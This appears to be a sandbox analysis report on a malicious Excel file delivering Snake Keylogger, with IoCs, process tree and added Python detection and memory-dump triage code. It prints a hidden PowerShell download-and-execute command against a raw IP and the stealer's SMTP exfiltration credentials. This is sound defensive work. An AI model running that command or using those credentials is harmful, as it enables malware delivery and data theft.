Analysis
- max time kernel: 150s
- max time network: 149s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 14-04-2021 20:08
Static task: static1
Behavioral task: behavioral1
  Sample: IMG_50_78_63.xls
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: IMG_50_78_63.xls
  Resource: win10v20210410
(The results below are from behavioral1, the Windows 7 x64 / Office 14 run.)
General
- Target: IMG_50_78_63.xls
- Size: 167KB
- MD5: 4c9d3db50cd58ec12305d904d2354f00
- SHA1: b0a4028da497f94c3d00f0c44a60b40fc369d5bc
- SHA256: fa0e9c96ef83963d0ab05d58302b13ac57356aed411562c71ef1812066e8ac97
- SHA512: 744fa49552e1cca5a0dc71da06d55f61a4f3380b61974e9306cfc79e91909169261b96e6ee3cc844df2e5e3354771e0468259f3522e21950e35397f0f9fb1a1e
Malware Config
Extracted
- Family: snakekeylogger
- Protocol: smtp
- Host: nobettwo.xyz
- Port: 587
- Username: folks@nobettwo.xyz
- Password: [FY$nv_Hp[H7
The extracted configuration is the exfiltration channel: the stealer mails its collected data out through the attacker-controlled mailbox on nobettwo.xyz over SMTP submission (port 587), so the host and the account are the network indicators to block and hunt for.
Signatures
- Snake Keylogger: keylogger and infostealer first seen in November 2020.

Snake Keylogger Payload 3 IoCs
  resource                                                                      yara_rule
  behavioral1/memory/2028-104-0x0000000000400000-0x000000000046A000-memory.dmp  family_snakekeylogger
  behavioral1/memory/2028-105-0x000000000046479E-mapping.dmp                    family_snakekeylogger
  behavioral1/memory/2028-108-0x0000000000400000-0x000000000046A000-memory.dmp  family_snakekeylogger
  All three matches are in the memory of PID 2028, the self-spawned child that is the target of SetThreadContext below; no on-disk file is listed as matching.

Blocklisted process makes network request 1 IoCs
  flow  pid  process
  6     544  powershell.exe

Executes dropped EXE 2 IoCs
  pid   process
  1912  seesituation.exe
  2028  seesituation.exe

Loads dropped DLL 4 IoCs
  pid   process
  544   powershell.exe (3 entries)
  1912  seesituation.exe

Looks up external IP address via web service 3 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  8     checkip.dyndns.org
  13    freegeoip.app
  14    freegeoip.app

Drops file in System32 directory 5 IoCs
  description                   ioc                                                                                                                          process
  File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
  File created                  C:\Windows\SysWOW64\PerfStringBackup.TMP                                                                                     OUTLOOK.EXE
  File opened for modification  C:\Windows\SysWOW64\PerfStringBackup.INI                                                                                     OUTLOOK.EXE
  File created                  C:\Windows\system32\perfc009.dat                                                                                             OUTLOOK.EXE
  File created                  C:\Windows\system32\perfh009.dat                                                                                             OUTLOOK.EXE

Suspicious use of SetThreadContext 1 IoCs
  PID 1912 (seesituation.exe) set thread context of PID 2028 (seesituation.exe)

Drops file in Windows directory 3 IoCs
  description                   ioc                                       process
  File created                  C:\Windows\inf\Outlook\outlperf.h         OUTLOOK.EXE
  File opened for modification  C:\Windows\inf\Outlook\outlperf.h         OUTLOOK.EXE
  File created                  C:\Windows\inf\Outlook\0009\outlperf.ini  OUTLOOK.EXE
  The OUTLOOK.EXE entries here and under the System32 signature are Outlook's own performance-counter registration on first start (a side effect of the -Embedding launch), not payload drops; the powershell.exe entry is the only one attributable to the malicious chain.
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
  description  ioc                                                                   process
  Key opened   \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor  EXCEL.EXE

Modifies Internet Explorer settings 9 IoCs
  All entries by EXCEL.EXE under \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\
  Key created      Toolbar
  Key created      MenuExt
  Key created      MenuExt\Se&nd to OneNote
  Key created      MenuExt\E&xport to Microsoft Excel
  Set value (int)  MenuExt\E&xport to Microsoft Excel\Contexts = "1"
  Set value (str)  Toolbar\ShowDiscussionButton = "Yes"
  Set value (str)  MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"
  Set value (int)  MenuExt\Se&nd to OneNote\Contexts = "55"
  Set value (str)  MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"
  These are the Internet Explorer context-menu and toolbar hooks Office registers when Excel is first started; they are not attributable to the sample.
Modifies registry class 64 IoCs
  All entries by OUTLOOK.EXE under \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\ (Outlook object-library type-library and proxy-stub registration; {00062FFF-0000-0000-C000-000000000046} is the Outlook type library, version 9.4):
  Key created      {000672EB-0000-0000-C000-000000000046}\TypeLib
  Set value (str)  {000672F9-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"
  Key created      {000630D0-0000-0000-C000-000000000046}\TypeLib
  Key created      {00063102-0000-0000-C000-000000000046}\ProxyStubClsid32
  Set value (str)  {0006303F-0000-0000-C000-000000000046}\ = "Pages"
  Set value (str)  {000672D9-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"
  Set value (str)  {0006302D-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"
  Key created      {000630FB-0000-0000-C000-000000000046}\TypeLib
  Key created      {0006302B-0000-0000-C000-000000000046}\TypeLib
  Set value (str)  {000630EA-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"
  Set value (str)  {00067352-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"
  Set value (str)  {000672ED-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"
  Key created      {000630D2-0000-0000-C000-000000000046}\TypeLib
  Key created      {000630D3-0000-0000-C000-000000000046}\TypeLib
  Key created      {00063089-0000-0000-C000-000000000046}\TypeLib
  Key created      {000630CA-0000-0000-C000-000000000046}
  Set value (str)  {D87E7E17-6897-11CE-A6C0-00AA00608FAA}\TypeLib\Version = "9.4"
  Key created      {000630E8-0000-0000-C000-000000000046}
  Key created      {0006308D-0000-0000-C000-000000000046}\TypeLib
  Key created      {0006303F-0000-0000-C000-000000000046}
  Set value (str)  {00063096-0000-0000-C000-000000000046}\ = "_TableView"
  Set value (str)  {00063096-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"
  Set value (str)  {00063024-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"
  Key created      {00063087-0000-0000-C000-000000000046}\TypeLib
  Set value (str)  {0006303D-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"
  Set value (str)  {0006300A-0000-0000-C000-000000000046}\ = "_Explorers"
  Key created      {0006300F-0000-0000-C000-000000000046}\TypeLib
  Set value (str)  {0006307B-0000-0000-C000-000000000046}\ = "OutlookBarGroupsEvents"
  Set value (str)  {000630A0-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"
  Key created      {0006305A-0000-0000-C000-000000000046}
  Key created      {000672DB-0000-0000-C000-000000000046}\ProxyStubClsid32
  Key created      {000630CC-0000-0000-C000-000000000046}
  Set value (str)  {00063074-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"
  Key created      {00063075-0000-0000-C000-000000000046}\TypeLib
  Key created      {000630A1-0000-0000-C000-000000000046}
  Key created      {00063005-0000-0000-C000-000000000046}\TypeLib
  Key created      {0006308D-0000-0000-C000-000000000046}\ProxyStubClsid32
  Key created      {0006308A-0000-0000-C000-000000000046}\ProxyStubClsid32
  Key created      {0006302F-0000-0000-C000-000000000046}
  Set value (str)  {0006302F-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"
  Set value (str)  {000672EE-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"
  Key created      {0006304E-0000-0000-C000-000000000046}\TypeLib
  Key created      {000630F0-0000-0000-C000-000000000046}
  Key created      {00063096-0000-0000-C000-000000000046}
  Set value (str)  {00063104-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"
  Set value (str)  {000672DF-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"
  Set value (str)  {000630C4-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"
  Key created      {0006304F-0000-0000-C000-000000000046}
  Key created      {0006309A-0000-0000-C000-000000000046}\ProxyStubClsid32
  Set value (str)  {00067353-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"
  Set value (str)  {000630FA-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"
  Key created      {00063103-0000-0000-C000-000000000046}\ProxyStubClsid32
  Set value (str)  {00063037-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"
  Set value (str)  {00063104-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"
  Set value (str)  {0006302B-0000-0000-C000-000000000046}\ = "ItemEvents_10"
  Key created      {00063083-0000-0000-C000-000000000046}\TypeLib
  Key created      {000630C4-0000-0000-C000-000000000046}\TypeLib
  Set value (str)  {000630A1-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"
  Set value (str)  {000630A2-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"
  Set value (str)  {000630E2-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"
  Set value (str)  {000630D4-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"
  Set value (str)  {000630D5-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"
  Key created      {00067368-0000-0000-C000-000000000046}\ProxyStubClsid32
  Set value (str)  {00063093-0000-0000-C000-000000000046}\ = "_AutoFormatRule"
Suspicious behavior: AddClipboardFormatListener 1 IoCs
  pid   process
  1652  EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs
  pid   process
  544   powershell.exe
  1912  seesituation.exe (2 entries)
  2028  seesituation.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs
  token                pid   process
  SeDebugPrivilege     544   powershell.exe
  SeShutdownPrivilege  1728  OUTLOOK.EXE
  SeDebugPrivilege     1912  seesituation.exe
  SeDebugPrivilege     2028  seesituation.exe

Suspicious use of FindShellTrayWindow 6 IoCs
  pid   process
  1728  OUTLOOK.EXE (6 entries)

Suspicious use of SendNotifyMessage 5 IoCs
  pid   process
  1728  OUTLOOK.EXE (5 entries)

Suspicious use of SetWindowsHookEx 4 IoCs
  pid   process
  1652  EXCEL.EXE (3 entries)
  1728  OUTLOOK.EXE

Suspicious use of WriteProcessMemory 17 IoCs
  source pid  source process    target pid  target process    entries
  1728        OUTLOOK.EXE       544         powershell.exe    4
  544         powershell.exe    1912        seesituation.exe  4
  1912        seesituation.exe  2028        seesituation.exe  9
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (PID 1652)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IMG_50_78_63.xls
  - Enumerates system info in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE (PID 1728)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 544, child of OUTLOOK.EXE)
    Command line: powershell -w Hidden Invoke-WebRequest -Uri "http://178.17.171.144/sch/Kqslz.exe" -OutFile "C:\Users\Public\Documents\seesituation.exe";C:\Users\Public\Documents\seesituation.exe
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Users\Public\Documents\seesituation.exe (PID 1912, child of powershell.exe)
      Command line: "C:\Users\Public\Documents\seesituation.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Local\Temp\seesituation.exe (PID 2028, child of seesituation.exe)
        Command line: C:\Users\Admin\AppData\Local\Temp\seesituation.exe
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

Execution chain as recorded: the document is opened in EXCEL.EXE (PID 1652, launched with /dde) and VBA resources are loaded. OUTLOOK.EXE (PID 1728) starts as a COM server (-Embedding) and is the recorded parent of the PowerShell one-liner (PID 544), which runs with a hidden window, fetches http://178.17.171.144/sch/Kqslz.exe, writes it to C:\Users\Public\Documents\seesituation.exe and executes it (PID 1912). That process starts a second copy of its own image (PID 2028), writes to its memory and sets its thread context, which is consistent with process hollowing; the Snake Keylogger YARA matches are on PID 2028's memory at 0x400000-0x46A000, so the unpacked payload lives in that child rather than in the file on disk. Note that the parent of powershell.exe is OUTLOOK.EXE, not EXCEL.EXE: a detection rule that only pairs the opened document's application with the script host will miss this chain.
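The chain above (Office application spawning a hidden PowerShell download cradle, execution of the downloaded file from a user-writable directory, then a self-spawn followed by SetThreadContext) is what an endpoint rule should catch. The following Python is an added example, not part of the sandbox output: it runs simple rules over process-creation and thread-context events and pairs the cradle's -OutFile path with the later execution. The event records are constructed to mirror this report's process tree (PIDs, image paths and command lines copied from it); the record field names and the parent PID 1000 assigned to the two Office processes are assumptions of the example.

```python
"""Endpoint detection rules for the chain in this report's process tree.

Added example, not part of the sandbox output. The event records below are
constructed to mirror the report (PIDs, image paths and command lines copied
from it); the record field names and the parent PID 1000 assigned to the two
Office processes are assumptions of the example.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Common PowerShell download cradles; matched case-insensitively.
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
# -OutFile <path>: the file the cradle writes, used to pair download with execution.
OUTFILE = re.compile(r'-OutFile\s+"?([^";\s]+)"?', re.I)
# User-writable staging locations favoured by document-borne droppers.
USER_WRITABLE = re.compile(r"^c:\\users\\(public|[^\\]+\\appdata\\local\\temp)\\", re.I)


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class ThreadContextEvent:
    """SetThreadContext(src -> target), as the sandbox reports it."""
    src_pid: int
    target_pid: int


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(procs, thread_ctx=()):
    """Return (pid, rule, detail) findings; events are expected in creation order."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    staged = {}  # lower-cased -OutFile path -> pid of the PowerShell that wrote it

    for p in procs:
        parent = by_pid.get(p.ppid)
        pname = _name(parent.image) if parent else ""
        iname = _name(p.image)

        # Office application spawning a script host: here OUTLOOK.EXE -> powershell.exe
        if pname in OFFICE_APPS and iname in SCRIPT_HOSTS:
            findings.append((p.pid, "office_spawns_script_host", f"{pname} -> {iname}"))

        # Download cradle; remember where it writes so execution can be paired to it.
        if iname in ("powershell.exe", "pwsh.exe") and DOWNLOAD_CRADLE.search(p.cmdline):
            findings.append((p.pid, "powershell_download_cradle", p.cmdline))
            for m in OUTFILE.finditer(p.cmdline):
                staged[m.group(1).lower()] = p.pid

        # Execution of the file a cradle just wrote, or of anything a script host
        # launches from a user-writable staging directory.
        if p.image.lower() in staged:
            findings.append((p.pid, "download_then_execute",
                             f"{p.image} written by pid {staged[p.image.lower()]}"))
        elif pname in SCRIPT_HOSTS and USER_WRITABLE.match(p.image):
            findings.append((p.pid, "script_host_runs_user_writable_exe", p.image))

    # Process hollowing pattern: a process starts its own image, then calls
    # SetThreadContext on that child (1912 -> 2028 in this report).
    for t in thread_ctx:
        src, dst = by_pid.get(t.src_pid), by_pid.get(t.target_pid)
        if src and dst and dst.ppid == src.pid and _name(src.image) == _name(dst.image):
            findings.append((dst.pid, "self_spawn_then_setthreadcontext",
                             f"{src.pid} -> {dst.pid} ({_name(dst.image)})"))
    return findings


# Constructed from the report's process tree; ppid 1000 for the Office processes is made up.
SAMPLE_PROCS = [
    ProcessEvent(1652, 1000, r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
                 r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde '
                 r"C:\Users\Admin\AppData\Local\Temp\IMG_50_78_63.xls"),
    ProcessEvent(1728, 1000, r"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE",
                 r'"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding'),
    ProcessEvent(544, 1728, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell -w Hidden Invoke-WebRequest -Uri "http://178.17.171.144/sch/Kqslz.exe" '
                 r'-OutFile "C:\Users\Public\Documents\seesituation.exe";'
                 r"C:\Users\Public\Documents\seesituation.exe"),
    ProcessEvent(1912, 544, r"C:\Users\Public\Documents\seesituation.exe",
                 r'"C:\Users\Public\Documents\seesituation.exe"'),
    ProcessEvent(2028, 1912, r"C:\Users\Admin\AppData\Local\Temp\seesituation.exe",
                 r"C:\Users\Admin\AppData\Local\Temp\seesituation.exe"),
]
SAMPLE_THREAD_CTX = [ThreadContextEvent(1912, 2028)]

if __name__ == "__main__":
    for pid, rule, detail in detect(SAMPLE_PROCS, SAMPLE_THREAD_CTX):
        print(f"{pid:>5}  {rule:<36} {detail}")
```

Run against the sample events it reports four findings: the Outlook-to-PowerShell spawn, the download cradle, the execution of the file the cradle wrote (PID 1912) and the self-spawn plus SetThreadContext on PID 2028. The pairing through -OutFile is what keeps the rule from firing on every executable launched from a temp directory; the hollowing rule keys on same-image parent/child plus the context change rather than on the image name, so it does not depend on the dropper's file name.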
Downloads
The dropped executable (the file fetched from http://178.17.171.144/sch/Kqslz.exe) is listed eight times under four path spellings, with and without the drive letter; all entries carry the same hashes:
- C:\Users\Public\Documents\seesituation.exe
- C:\Users\Admin\AppData\Local\Temp\seesituation.exe
- \Users\Public\Documents\seesituation.exe
- \Users\Admin\AppData\Local\Temp\seesituation.exe
  MD5: a8520120160bf0ed2d5f1a62ccd0a2a6
  SHA1: ddf74b46aee71d32e31e66aad8b3599a5512eea5
  SHA256: a86d574b0b47c886fa1c8e31a0e4486d53398d58641c4c04ecdbf80e34922e33
  SHA512: c0e8c227bb54f74f9cdf1400ad681aa1441d22467f69e7633cd3806510c804d3e57c4bf9db65fa9c66d075423d8c2b7aef3aa932e995cff66cb1aaf54d8854b9
-
Memory dumps (grouped by PID; a mapping.dmp entry records an address rather than a region)
  dump                                                            size
  memory/544-65-0x0000000000000000-mapping.dmp                    -
  memory/544-66-0x00000000754F1000-0x00000000754F3000-memory.dmp  8KB
  memory/544-67-0x0000000000D90000-0x0000000000D91000-memory.dmp  4KB
  memory/544-68-0x0000000004820000-0x0000000004821000-memory.dmp  4KB
  memory/544-69-0x0000000001330000-0x0000000001331000-memory.dmp  4KB
  memory/544-70-0x0000000001332000-0x0000000001333000-memory.dmp  4KB
  memory/544-71-0x00000000012D0000-0x00000000012D1000-memory.dmp  4KB
  memory/544-72-0x0000000005240000-0x0000000005241000-memory.dmp  4KB
  memory/544-75-0x00000000057E0000-0x00000000057E1000-memory.dmp  4KB
  memory/544-80-0x00000000061F0000-0x00000000061F1000-memory.dmp  4KB
  memory/544-81-0x0000000006470000-0x0000000006471000-memory.dmp  4KB
  memory/544-88-0x0000000006390000-0x0000000006391000-memory.dmp  4KB
  memory/544-89-0x0000000006500000-0x0000000006501000-memory.dmp  4KB
  memory/544-90-0x000000007EF20000-0x000000007EF21000-memory.dmp  4KB
  memory/1652-60-0x000000002F951000-0x000000002F954000-memory.dmp  12KB
  memory/1652-61-0x0000000070F81000-0x0000000070F83000-memory.dmp  8KB
  memory/1652-62-0x000000005FFF0000-0x0000000060000000-memory.dmp  64KB
  memory/1652-111-0x000000005FFF0000-0x0000000060000000-memory.dmp  64KB
  memory/1912-93-0x0000000000000000-mapping.dmp                    -
  memory/1912-97-0x0000000001000000-0x0000000001001000-memory.dmp  4KB
  memory/1912-99-0x0000000004BA0000-0x0000000004BA1000-memory.dmp  4KB
  memory/1912-100-0x0000000000470000-0x0000000000472000-memory.dmp  8KB
  memory/1912-101-0x0000000004BA5000-0x0000000004BB6000-memory.dmp  68KB
  memory/1912-102-0x0000000000720000-0x000000000075D000-memory.dmp  244KB
  memory/2028-104-0x0000000000400000-0x000000000046A000-memory.dmp  424KB
  memory/2028-105-0x000000000046479E-mapping.dmp                    -
  memory/2028-108-0x0000000000400000-0x000000000046A000-memory.dmp  424KB
  memory/2028-110-0x0000000004AE0000-0x0000000004AE1000-memory.dmp  4KB
  The two 424KB dumps of PID 2028 at 0x400000-0x46A000 are the regions the Snake Keylogger YARA rule matched; the mapping entry 0x46479E lies inside that region.
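Which of the dumps above to pull for static analysis of the unpacked payload is a question every such report raises. The added example below (not part of the report) parses dump names in the form listed here, groups them by PID, and for the process that was the target of SetThreadContext selects the dumped region that starts at a PE image base and contains a recorded mapping address, largest first. The sample list is a constructed subset of the dumps above; reading the mapping.dmp address as the execution entry set by SetThreadContext is an assumption of the example.

```python
"""Picking the dump that holds the unpacked payload.

Added example, not part of the report. Dump names are parsed in the form the
report lists them: memory/<pid>-<seq>-0x<start>[-0x<end>]-(memory|mapping).dmp.
Treating a mapping.dmp address as the execution entry recorded after
SetThreadContext is an assumption of this example.
"""
import re
from collections import defaultdict

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+))?-(?P<kind>memory|mapping)\.dmp$")


def parse_dump(name):
    """Split a dump name into its fields; end is None for mapping entries."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    return {
        "name": name,
        "pid": int(m["pid"]),
        "seq": int(m["seq"]),
        "start": int(m["start"], 16),
        "end": int(m["end"], 16) if m["end"] else None,
        "kind": m["kind"],
    }


def size_kb(dump):
    """Region size in KiB (0 for mapping entries, which carry only an address)."""
    return 0 if dump["end"] is None else (dump["end"] - dump["start"]) // 1024


def payload_candidates(names, hollowed_pids, image_bases=(0x400000,)):
    """For each hollowed PID, list dumped regions that start at a PE image base and
    contain a recorded mapping address, largest first: {pid: [(name, kb, [addrs])]}."""
    by_pid = defaultdict(list)
    for n in names:
        d = parse_dump(n)
        by_pid[d["pid"]].append(d)

    result = {}
    for pid in hollowed_pids:
        regions = [d for d in by_pid[pid] if d["kind"] == "memory"]
        entries = [d["start"] for d in by_pid[pid] if d["kind"] == "mapping"]
        cands = []
        for r in regions:
            inside = [e for e in entries if r["start"] <= e < r["end"]]
            if r["start"] in image_bases and inside:
                cands.append((r["name"], size_kb(r), inside))
        result[pid] = sorted(cands, key=lambda c: -c[1])
    return result


# Constructed subset of the dump list in this report.
SAMPLE_DUMPS = [
    "memory/544-65-0x0000000000000000-mapping.dmp",
    "memory/544-66-0x00000000754F1000-0x00000000754F3000-memory.dmp",
    "memory/1912-93-0x0000000000000000-mapping.dmp",
    "memory/1912-97-0x0000000001000000-0x0000000001001000-memory.dmp",
    "memory/1912-102-0x0000000000720000-0x000000000075D000-memory.dmp",
    "memory/2028-104-0x0000000000400000-0x000000000046A000-memory.dmp",
    "memory/2028-105-0x000000000046479E-mapping.dmp",
    "memory/2028-108-0x0000000000400000-0x000000000046A000-memory.dmp",
    "memory/2028-110-0x0000000004AE0000-0x0000000004AE1000-memory.dmp",
]

if __name__ == "__main__":
    for pid, cands in payload_candidates(SAMPLE_DUMPS, [1912, 2028]).items():
        print(pid, cands or "no candidate region")
```

For PID 2028 this returns the two 424KB dumps at 0x400000 with 0x46479E inside them, which is exactly the pair the YARA rule matched; the dropper PID 1912 yields nothing because its only mapping address is 0, so its dumps are the packed loader and can be skipped when the goal is the unpacked stealer.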